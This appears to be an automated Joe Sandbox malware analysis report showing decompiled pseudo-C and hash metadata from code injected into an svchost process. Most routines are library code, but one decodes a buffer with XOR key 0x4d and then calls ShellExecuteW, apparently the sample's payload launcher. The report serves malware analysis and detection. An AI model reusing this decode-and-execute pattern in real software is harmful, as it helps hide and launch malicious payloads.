                                                            • Instruction Fuzzy Hash: 0501522672164462FEFBA7F1A95D3EC73D16B44784F080928AD26037DBFF3B88414611
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CursorDestroyObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 4069081368-0
                                                            • Opcode ID: 4278b4987723f14b40243e5f0d0d37319393fc78930324d730d70b27e8fb29a1
                                                            • Instruction ID: 99aa6831730f8626dd2ca929e85827d94b7329f1e1e3c8f6e11f778b53faef34
                                                            • Opcode Fuzzy Hash: 4278b4987723f14b40243e5f0d0d37319393fc78930324d730d70b27e8fb29a1
                                                            • Instruction Fuzzy Hash: 39114C37601E45A6EF668F65E8482997370F788B55F148122DB9E43725DF39C486C380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF53C3C0() {
                                                            				long long _v16;
                                                            				char _v24;
                                                            				long long _v32;
                                                            				char _v40;
                                                            				long long _v48;
                                                            				intOrPtr _v56;
                                                            				void* __rbx;
                                                            				long long _t24;
                                                            				void* _t26;
                                                            				void* _t30;
                                                            
                                                            				_v24 = 1;
                                                            				_v40 = 0x22baf53b6f0;
                                                            				r9d = 0;
                                                            				_v32 = _t24;
                                                            				r8d = 0;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				_v48 = _t24;
                                                            				_v16 = 0x22baf53b6f0;
                                                            				_v56 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, 0x22baf53b6f0, _t24, _t26, _t30, 0xaf548af0,  &_v40);
                                                            				WaitForSingleObject(??, ??);
                                                            				CloseHandle(??);
                                                            				if (0x22baf53b6f0 == 0xffffffff) goto 0xaf53c43c;
                                                            				return CloseHandle(??);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CreateEventObjectSingleWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2690870669-0
                                                            • Opcode ID: 244089877ae0aaf6f56ea6e6f63b29b8664b81922cbe1f6ae4cb29b06f114dd7
                                                            • Instruction ID: 642c551f88c3889c2a68c5e74fd527d6ecb5f47ff22d0b0c5efdcdafd4a6e7fa
                                                            • Opcode Fuzzy Hash: 244089877ae0aaf6f56ea6e6f63b29b8664b81922cbe1f6ae4cb29b06f114dd7
                                                            • Instruction Fuzzy Hash: 1101A733614A40A2EB31CFB9F84C59A77A1F7C5775F544325E7AA02AE9CF3AC0558700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$ObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 2079671238-0
                                                            • Opcode ID: 7e657f105379da636152b0d689527d39c812b14597d051043c4ff3947b2bd710
                                                            • Instruction ID: 0ae86fff88ef97dda9f6dd7f062de2186edf9871a6d15458c27fb7afd93c268e
                                                            • Opcode Fuzzy Hash: 7e657f105379da636152b0d689527d39c812b14597d051043c4ff3947b2bd710
                                                            • Instruction Fuzzy Hash: BCF03C32212B05A5EF26DFA5E86C6D833A4EB48F16F5005218A1E42379DF39C19AC350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E0000022B22BAF57238C(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
                                                            				void* _v24;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v56;
                                                            				long long _v72;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v96;
                                                            				long long _v104;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t69;
                                                            				char _t70;
                                                            				char _t73;
                                                            				signed char _t75;
                                                            				void* _t86;
                                                            				intOrPtr _t87;
                                                            				void* _t88;
                                                            				signed int _t96;
                                                            				void* _t124;
                                                            				intOrPtr* _t139;
                                                            				char* _t143;
                                                            				long long _t171;
                                                            				signed long long _t174;
                                                            				intOrPtr* _t178;
                                                            				char* _t179;
                                                            				signed long long _t184;
                                                            				void* _t185;
                                                            				signed long long _t192;
                                                            				signed long long _t194;
                                                            				signed long long _t197;
                                                            				signed long long _t201;
                                                            				intOrPtr* _t202;
                                                            				char* _t203;
                                                            				intOrPtr* _t204;
                                                            				char* _t205;
                                                            				void* _t206;
                                                            				char* _t208;
                                                            				void* _t209;
                                                            				char* _t210;
                                                            				char* _t211;
                                                            				char* _t212;
                                                            				char* _t213;
                                                            				unsigned int* _t216;
                                                            				void* _t219;
                                                            				intOrPtr* _t221;
                                                            				char* _t227;
                                                            				long long _t235;
                                                            				intOrPtr* _t239;
                                                            				char* _t241;
                                                            
                                                            				_t171 = __rbx;
                                                            				_t139 = _t221;
                                                            				 *((long long*)(_t139 + 8)) = __rbx;
                                                            				 *((long long*)(_t139 + 0x10)) = __rbp;
                                                            				 *((long long*)(_t139 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t139 + 0x20)) = __rdi;
                                                            				_push(_t235);
                                                            				r12d = 0;
                                                            				_t201 = __rdx;
                                                            				 *((intOrPtr*)(__rdx)) = r12b;
                                                            				_t216 = __rcx;
                                                            				_t174 = _t139 - 0x38;
                                                            				_t219 = __r8;
                                                            				_t86 =  <  ? r12d : _a48;
                                                            				E0000022B22BAF56440C(_t139, __rbx, _t174, _a72);
                                                            				if (__r8 - _t171 + 0xb > 0) goto 0xaf5723fa;
                                                            				_t62 = E0000022B22BAF567054(_t139);
                                                            				_t9 = _t235 + 0x22; // 0x22
                                                            				_t87 = _t9;
                                                            				 *_t139 = _t87;
                                                            				E0000022B22BAF564328(_t62);
                                                            				goto 0xaf5726b5;
                                                            				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0xaf572485;
                                                            				_v72 = _t235;
                                                            				_v80 = _a64;
                                                            				_t192 = _t201;
                                                            				_t143 = _a40;
                                                            				_v88 = r12b;
                                                            				_v96 = _t87;
                                                            				_v104 = _t143;
                                                            				_t65 = E0000022B22BAF5726EC(_t171, __rcx, _t192, __rcx, __r8);
                                                            				_t88 = _t65;
                                                            				if (_t65 == 0) goto 0xaf572453;
                                                            				 *_t201 = r12b;
                                                            				goto 0xaf5726b5;
                                                            				strrchr(_t241);
                                                            				if (_t143 == 0) goto 0xaf5726b2;
                                                            				asm("sbb dl, dl");
                                                            				 *_t143 = 0xd0;
                                                            				 *((intOrPtr*)(_t143 + 3)) = r12b;
                                                            				goto 0xaf5726b2;
                                                            				if (( *_t216 & 0x00000000) == 0) goto 0xaf57249a;
                                                            				 *_t201 = 0x2d;
                                                            				_t202 = _t201 + 1;
                                                            				r15b = _a56;
                                                            				r10d = 0x30;
                                                            				asm("sbb edx, edx");
                                                            				if (( *_t216 & 0x00000000) != 0) goto 0xaf5724ed;
                                                            				 *_t202 = r10b;
                                                            				_t203 = _t202 + 1;
                                                            				asm("dec eax");
                                                            				goto 0xaf5724f3;
                                                            				 *_t203 = 0x31;
                                                            				_t204 = _t203 + 1;
                                                            				_t239 = _t204;
                                                            				_t205 = _t204 + 1;
                                                            				if (_t88 != 0) goto 0xaf572502;
                                                            				 *_t239 = r12b;
                                                            				goto 0xaf572516;
                                                            				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
                                                            				if (( *_t216 & 0xffffffff) <= 0) goto 0xaf5725a9;
                                                            				r8d = r10w & 0xffffffff;
                                                            				if (_t88 <= 0) goto 0xaf57255f;
                                                            				_t69 =  ~r15b + r10w;
                                                            				_t124 = _t69 - 0x39;
                                                            				if (_t124 <= 0) goto 0xaf57254d;
                                                            				_t70 = _t69 + 0xffffffff000000e7;
                                                            				 *_t205 = _t70;
                                                            				_t206 = _t205 + 1;
                                                            				r8w = r8w + 0xfffc;
                                                            				if (_t124 >= 0) goto 0xaf57252d;
                                                            				if (r8w < 0) goto 0xaf5725a9;
                                                            				_t96 = r8b;
                                                            				if (_t70 - 8 <= 0) goto 0xaf5725a9;
                                                            				_t28 = _t206 - 1; // 0x2
                                                            				_t178 = _t28;
                                                            				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0xaf57258e;
                                                            				 *_t178 = r10b;
                                                            				_t179 = _t178 - 1;
                                                            				goto 0xaf57257e;
                                                            				if (_t179 == _t239) goto 0xaf5725a6;
                                                            				_t73 =  *_t179;
                                                            				if (_t73 != 0x39) goto 0xaf5725a0;
                                                            				 *_t179 = 0xffffffff00000121;
                                                            				goto 0xaf5725a9;
                                                            				 *_t179 = _t73 + 1;
                                                            				goto 0xaf5725a9;
                                                            				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
                                                            				if (_t88 - 1 <= 0) goto 0xaf5725c4;
                                                            				_t75 = E0000022B22BAF563830(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
                                                            				r10d = 0x30;
                                                            				_t208 =  ==  ? _t239 : _t206 + _t171;
                                                            				r15b =  ~r15b;
                                                            				asm("sbb al, al");
                                                            				 *_t208 = (_t75 & 0x000000e0) + 0x70;
                                                            				if ( *_t239 - r12b < 0) goto 0xaf5725f2;
                                                            				 *((char*)(_t208 + 1)) = 0x2b;
                                                            				_t209 = _t208 + 2;
                                                            				goto 0xaf5725fd;
                                                            				 *((char*)(_t209 + 1)) = 0x2d;
                                                            				_t210 = _t209 + 2;
                                                            				_t184 =  ~(( *_t216 >> 0x34) - _t219);
                                                            				 *_t210 = r10b;
                                                            				_t227 = _t210;
                                                            				if (_t184 - 0x3e8 < 0) goto 0xaf57263f;
                                                            				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
                                                            				 *_t210 = __r10 + _t194;
                                                            				_t211 = _t210 + 1;
                                                            				_t185 = _t184 + _t194 * 0xfffffc18;
                                                            				if (_t211 != _t227) goto 0xaf572645;
                                                            				if (_t185 - 0x64 < 0) goto 0xaf572673;
                                                            				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
                                                            				 *_t211 = __r10 + _t197;
                                                            				_t212 = _t211 + 1;
                                                            				if (_t212 != _t227) goto 0xaf57267e;
                                                            				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0xaf5726a9;
                                                            				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
                                                            				_t213 = _t212 + 1;
                                                            				 *_t213 = (_t96 & 0x000007ff) + r10b;
                                                            				 *((intOrPtr*)(_t213 + 1)) = r12b;
                                                            				if (_v32 == r12b) goto 0xaf5726c8;
                                                            				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
                                                            				return r12d;
			}


                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: 9a00b7d015ee79e1782b76473061e7a9280a011899ea1bca82edb2c9d518c6c5
                                                            • Instruction ID: ae4a99bb53d45859cb6a3a6c82b13d090e5f6d2e4cacbf6b9a84c7229b85fc80
                                                            • Opcode Fuzzy Hash: 9a00b7d015ee79e1782b76473061e7a9280a011899ea1bca82edb2c9d518c6c5
                                                            • Instruction Fuzzy Hash: 8A9157637053C596EF368F69A14C3D97BA5A325BD0F048522CB9907B97DF3AC511CB01
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF5727BC(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                            				void* _t11;
                                                            				void* _t13;
                                                            				intOrPtr* _t21;
                                                            				intOrPtr* _t35;
                                                            
                                                            				_t21 = _t35;
                                                            				 *((long long*)(_t21 + 8)) = __rbx;
                                                            				 *((long long*)(_t21 + 0x10)) = __rbp;
                                                            				 *((long long*)(_t21 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t21 + 0x20)) = __rdi;
                                                            				r15b = r9b;
                                                            				_t10 =  >  ? __ebx : 0;
                                                            				_t11 = ( >  ? __ebx : 0) + 9;
                                                            				if (__rdx - _t21 > 0) goto 0xaf572821;
                                                            				_t13 = E0000022B22BAF567054(_t21);
                                                            				 *_t21 = 0x22;
                                                            				E0000022B22BAF564328(_t13);
                                                            				return 0x22;
			}


                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: cdac167fcf2129b826a62c04b971c9004cfc57662dbad9fc748fd4d6a083cdd7
                                                            • Instruction ID: 8b97e116342dd4e23aa9cb776c36784c5e34a8f64fa00fc4c35e1ec72219f6fa
                                                            • Opcode Fuzzy Hash: cdac167fcf2129b826a62c04b971c9004cfc57662dbad9fc748fd4d6a083cdd7
                                                            • Instruction Fuzzy Hash: 535106637147C0A6EB768FB59949399BB91E341B90F0C9625D6A847BD7CF3EC084CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E0000022B22BAF5336D0(void* __eax, void* __edx, long long __rcx, long long __rdi, long long __rsi, long long __r8, long long __r14, long long __r15, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                            				void* _v24;
                                                            				void* _v32;
                                                            				void* _v40;
                                                            				void* _v64;
                                                            				intOrPtr _v72;
                                                            				void* _v80;
                                                            				void* _v88;
                                                            				long long _v104;
                                                            				void* _t59;
                                                            				long long _t100;
                                                            				intOrPtr* _t105;
                                                            				intOrPtr* _t110;
                                                            				intOrPtr* _t112;
                                                            				intOrPtr* _t113;
                                                            				intOrPtr* _t114;
                                                            				intOrPtr* _t115;
                                                            				void* _t125;
                                                            				void* _t128;
                                                            				void* _t139;
                                                            
                                                            				_t139 = _t128;
                                                            				 *((long long*)(_t139 + 8)) = __rcx;
                                                            				 *((long long*)(_t139 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t139 - 0x18)) = __rdi;
                                                            				 *((long long*)(_t139 - 0x20)) = __r14;
                                                            				 *((long long*)(_t139 - 0x28)) = __r15;
                                                            				_v80 = _t100;
                                                            				_t75 =  >=  ? __edx : 0;
                                                            				_v88 = _t100;
                                                            				_a8 = _t100;
                                                            				 *((long long*)(_t139 - 0x68)) =  &_v80;
                                                            				_t11 = _t100 + 1; // 0x1
                                                            				r8d = _t11;
                                                            				__imp__CoCreateInstance(_t100, _t125);
                                                            				if (__eax < 0) goto 0xaf533831;
                                                            				r9d = 0;
                                                            				if ( *((intOrPtr*)( *_v80 + 0x18))() != 0) goto 0xaf533831;
                                                            				_t15 = _t100 + 8; // 0x8
                                                            				r15d = _t15;
                                                            				_t105 = _a8;
                                                            				if (_t105 == 0) goto 0xaf533773;
                                                            				_a8 = _t100;
                                                            				 *((intOrPtr*)( *_t105 + 0x10))();
                                                            				if ( *((intOrPtr*)( *_v88 + 0x18))() != 0) goto 0xaf533831;
                                                            				_a32 = _t100;
                                                            				_v104 =  &_a32;
                                                            				r8d = 0;
                                                            				if ( *((intOrPtr*)( *_a8 + 0x48))() < 0) goto 0xaf5337ea;
                                                            				_v72 = r15w;
                                                            				r9d = 0;
                                                            				if ( *((intOrPtr*)( *_a32 + 0x18))() < 0) goto 0xaf5337ea;
                                                            				__imp__#6();
                                                            				_t83 = 0 - ( >=  ? __edx : 0);
                                                            				if (0 == ( >=  ? __edx : 0)) goto 0xaf533802;
                                                            				_t110 = _a32;
                                                            				if (_t110 == 0) goto 0xaf533760;
                                                            				 *((intOrPtr*)( *_t110 + 0x10))();
                                                            				goto 0xaf533760;
                                                            				r8d = 0;
                                                            				_v104 = __r8;
                                                            				_t59 =  *((intOrPtr*)( *_a8 + 0x40))();
                                                            				_t112 = _a32;
                                                            				if (_t112 == 0) goto 0xaf533831;
                                                            				 *((intOrPtr*)( *_t112 + 0x10))();
                                                            				_t113 = _a8;
                                                            				if (_t113 == 0) goto 0xaf533857;
                                                            				 *((intOrPtr*)( *_t113 + 0x10))();
                                                            				_t114 = _v88;
                                                            				if (_t114 == 0) goto 0xaf533866;
                                                            				 *((intOrPtr*)( *_t114 + 0x10))();
                                                            				_t115 = _v80;
                                                            				if (_t115 == 0) goto 0xaf533875;
                                                            				 *((intOrPtr*)( *_t115 + 0x10))();
                                                            				return 0 | _t59 > 0x00000000;
			}


                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFreeInstanceString
                                                            • String ID: FriendlyName
                                                            • API String ID: 586785272-3623505368
                                                            • Opcode ID: ee5a44b920a0522c40d0ec1c858e5ecd1c02b6a9db021fab092d16394c70930e
                                                            • Instruction ID: 0d4f0bd79a7c5892e587ca4cb73f7de58553cb16ea20aecf4469b7568bafe7e4
                                                            • Opcode Fuzzy Hash: ee5a44b920a0522c40d0ec1c858e5ecd1c02b6a9db021fab092d16394c70930e
                                                            • Instruction Fuzzy Hash: 23515537701B5496EB25CFAAD49869C77A4FB84F88B555126DE0E43B28CF36C849C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF559180(long long __rbx, intOrPtr* __rcx, void* __rdx, long long _a8) {
                                                            				void* _t10;
                                                            				intOrPtr* _t30;
                                                            				intOrPtr _t33;
                                                            				unsigned long long _t35;
                                                            				intOrPtr _t39;
                                                            				signed long long _t41;
                                                            				long long* _t44;
                                                            				intOrPtr _t53;
                                                            
                                                            				_a8 = __rbx;
                                                            				_t30 = __rcx;
                                                            				_t39 =  *((intOrPtr*)(__rcx + 8));
                                                            				if (__rdx - _t39 >= 0) goto 0xaf559240;
                                                            				_t53 =  *__rcx;
                                                            				if (_t53 - __rdx > 0) goto 0xaf559240;
                                                            				_t33 =  *((intOrPtr*)(__rcx + 0x10));
                                                            				if (_t39 != _t33) goto 0xaf559219;
                                                            				if (_t33 - _t39 >> 3 - 1 >= 0) goto 0xaf559219;
                                                            				_t41 = _t39 - _t53 >> 3;
                                                            				if (0xffffffff - _t41 - 1 < 0) goto 0xaf5592c7;
                                                            				_t35 = _t33 - _t53 >> 3;
                                                            				r9d = 0;
                                                            				_t54 =  >=  ? (_t35 >> 1) + _t35 : _t53;
                                                            				_t43 =  >=  ?  >=  ? (_t35 >> 1) + _t35 : _t53 : _t41 + 1;
                                                            				_t10 = E0000022B22BAF559AD0(__rcx, __rcx,  >=  ?  >=  ? (_t35 >> 1) + _t35 : _t53 : _t41 + 1);
                                                            				_t44 =  *((intOrPtr*)(_t30 + 8));
                                                            				if (_t44 == 0) goto 0xaf5592b7;
                                                            				 *_t44 =  *((intOrPtr*)( *_t30 + (__rdx - _t53 >> 3) * 8));
                                                            				 *((long long*)(_t30 + 8)) =  *((long long*)(_t30 + 8)) + 8;
                                                            				return _t10;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: vector<T> too long
                                                            • API String ID: 909987262-3788999226
                                                            • Opcode ID: 3593639ad2ffb16ee7440c00a7546e136af8ae350d2d2a0137a1f388cb4cd2ea
                                                            • Instruction ID: 768b5e89edba419ad935c61cbf6927048e49441eba2307cb3a23906f0bfde42b
                                                            • Opcode Fuzzy Hash: 3593639ad2ffb16ee7440c00a7546e136af8ae350d2d2a0137a1f388cb4cd2ea
                                                            • Instruction Fuzzy Hash: 4631C4B3720B8C51EE158BE9E61C6ECB351E394BE4F589221DA2E0BBD6DF6DD1418340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: vector<T> too long
                                                            • API String ID: 909987262-3788999226
                                                            • Opcode ID: b571931390e4ef176ca0175cb6605a2e306690df78c5dec5d51de02c19888cef
                                                            • Instruction ID: a8e38e05ea5e3d1bf0223a13e2f786ae1019ea1fe0907bd56e08a74da14036ef
                                                            • Opcode Fuzzy Hash: b571931390e4ef176ca0175cb6605a2e306690df78c5dec5d51de02c19888cef
                                                            • Instruction Fuzzy Hash: F631EA6372068491EE258FEAE52C2E9B351D349BF4F24A720D93D1BBDADF6DD1404340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E0000022B22BAF533E10(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                            				void* _t28;
                                                            				void* _t33;
                                                            				void* _t35;
                                                            				void* _t36;
                                                            				void* _t37;
                                                            				intOrPtr _t53;
                                                            				intOrPtr* _t58;
                                                            				signed long long _t61;
                                                            				intOrPtr* _t63;
                                                            				signed long long _t75;
                                                            				intOrPtr* _t78;
                                                            				signed long long _t88;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_a24 = __rdi;
                                                            				_t53 =  *((intOrPtr*)(__rdx + 0x10));
                                                            				_t88 = __r8;
                                                            				_t78 = __rdx;
                                                            				_t58 = __rcx;
                                                            				if (_t53 - __r8 < 0) goto 0xaf533f24;
                                                            				_t75 =  >  ? _t53 - __r8 : __r9;
                                                            				if (__rcx != __rdx) goto 0xaf533e83;
                                                            				_t61 = __r8 + _t75;
                                                            				if ( *(__rcx + 0x10) - _t61 < 0) goto 0xaf533f31;
                                                            				 *(__rcx + 0x10) = _t61;
                                                            				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xaf533e6b;
                                                            				goto 0xaf533e6e;
                                                            				 *((short*)(__rcx + _t61 * 2)) = 0;
                                                            				_t28 = E0000022B22BAF534130(__rcx, __rcx, __rcx, __r8);
                                                            				goto 0xaf533f0b;
                                                            				if (_t75 - 0xfffffffe > 0) goto 0xaf533f3e;
                                                            				if ( *((intOrPtr*)(__rcx + 0x18)) - _t75 >= 0) goto 0xaf533ec3;
                                                            				E0000022B22BAF533F50(_t28, _t33, __rcx, __rcx, _t75,  *(__rcx + 0x10));
                                                            				if (_t75 == 0) goto 0xaf533f0b;
                                                            				if ( *((long long*)(_t78 + 0x18)) - 8 < 0) goto 0xaf533eb7;
                                                            				if ( *((long long*)(_t58 + 0x18)) - 8 < 0) goto 0xaf533edd;
                                                            				_t63 =  *_t58;
                                                            				goto 0xaf533ee0;
                                                            				if (_t75 != 0) goto 0xaf533ead;
                                                            				 *((long long*)(_t63 + 0x10)) = 0xfffffffe;
                                                            				if ( *((long long*)(_t63 + 0x18)) - 8 < 0) goto 0xaf533ed8;
                                                            				 *((short*)( *_t63)) = 0;
                                                            				goto 0xaf533f0b;
                                                            				if (_t75 == 0) goto 0xaf533ef2;
                                                            				E0000022B22BAF562BA0(_t33, _t35, _t36, _t37, _t58,  *_t78 + _t88 * 2, _t75,  *_t78, _t75 + _t75);
                                                            				 *(_t58 + 0x10) = _t75;
                                                            				if ( *((long long*)(_t58 + 0x18)) - 8 < 0) goto 0xaf533f02;
                                                            				goto 0xaf533f05;
                                                            				 *((short*)(_t58 + _t75 * 2)) = 0;
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 909987262-4289949731
                                                            • Opcode ID: 15bd81ad7d9b0633510796e60dad112d28319fca4503710dab2adabb7bb79886
                                                            • Instruction ID: 09207b7589da1f3a8c4b47502849b731280f6a477d02c30258b2beea4b255ee1
                                                            • Opcode Fuzzy Hash: 15bd81ad7d9b0633510796e60dad112d28319fca4503710dab2adabb7bb79886
                                                            • Instruction Fuzzy Hash: 1531C533200B40A1EB36CB9DD5AC29D73A1F754BC4F905621DA1A87BAADF3AC551C380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E0000022B22BAF540740(void* __ebp, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __rsi, void* __r9, long long _a8) {
                                                            				intOrPtr _v16;
                                                            				long long _v24;
                                                            				void* __rdi;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr _t73;
                                                            				void* _t78;
                                                            				intOrPtr _t79;
                                                            				void* _t83;
                                                            
                                                            				_t78 = __rdx;
                                                            				_a8 = __rbx;
                                                            				 *((intOrPtr*)(__rcx + 0x40)) = 1;
                                                            				_t70 = __rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x18)) <= 0) goto 0xaf54077f;
                                                            				Sleep(??);
                                                            				if ( *((intOrPtr*)(__rcx + 0x40)) == 0) goto 0xaf540876;
                                                            				_t63 =  *__rcx;
                                                            				if (1 -  *((intOrPtr*)( *__rcx + 0x18)) < 0) goto 0xaf540760;
                                                            				if ( *((long long*)(__rcx + 0x28)) == 0) goto 0xaf540876;
                                                            				_t73 =  *__rcx;
                                                            				if ( *((intOrPtr*)(_t73 + 0x24)) <= 0) goto 0xaf540876;
                                                            				r8d =  *(_t73 + 0x4d) & 0x000000ff;
                                                            				r8d = r8d + ( *(_t73 + 0x4c) & 0x000000ff);
                                                            				r8d = r8d + ( *(_t73 + 0x4b) & 0x000000ff);
                                                            				r8d = r8d + ( *(_t73 + 0x4a) & 0x000000ff);
                                                            				E0000022B22BAF540430( *__rcx, __rcx, _t73, __rsi);
                                                            				if ( *((long long*)(__rcx + 0x28)) == 0) goto 0xaf5407f2;
                                                            				r8d =  *( *__rcx + 0x24);
                                                            				if (r8d == 0) goto 0xaf5407f2;
                                                            				if (r8d == 0) goto 0xaf5407f2;
                                                            				asm("o16 nop [eax+eax]");
                                                            				 *(_t78 +  *((intOrPtr*)(__rcx + 0x28))) =  *(_t78 +  *((intOrPtr*)(__rcx + 0x28))) ^ 0x0000004d;
                                                            				if (1 -  *( *__rcx + 0x24) < 0) goto 0xaf5407e0;
                                                            				_t79 =  *((intOrPtr*)(__rcx + 0x28));
                                                            				r8d =  *( *__rcx + 0x24);
                                                            				r9d = E0000022B22BAF540370( *__rcx, __rcx, _t63, _t79, _t63, _t83);
                                                            				if ( *((long long*)(_t70 + 0x28)) == 0) goto 0xaf540842;
                                                            				r8d =  *( *_t70 + 0x24);
                                                            				if (r8d == 0) goto 0xaf540842;
                                                            				if (r8d == 0) goto 0xaf540842;
                                                            				asm("o16 nop [eax+eax]");
                                                            				 *(_t79 +  *((intOrPtr*)(_t70 + 0x28))) =  *(_t79 +  *((intOrPtr*)(_t70 + 0x28))) ^ 0x0000004d;
                                                            				if (1 -  *( *_t70 + 0x24) < 0) goto 0xaf540830;
                                                            				if (r9d == 0) goto 0xaf54086e;
                                                            				_v16 = 1;
                                                            				_v24 = 0;
                                                            				ShellExecuteW(??, ??, ??, ??, ??, ??);
                                                            				E0000022B22BAF55A7E4( *_t70, _t63);
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            Strings
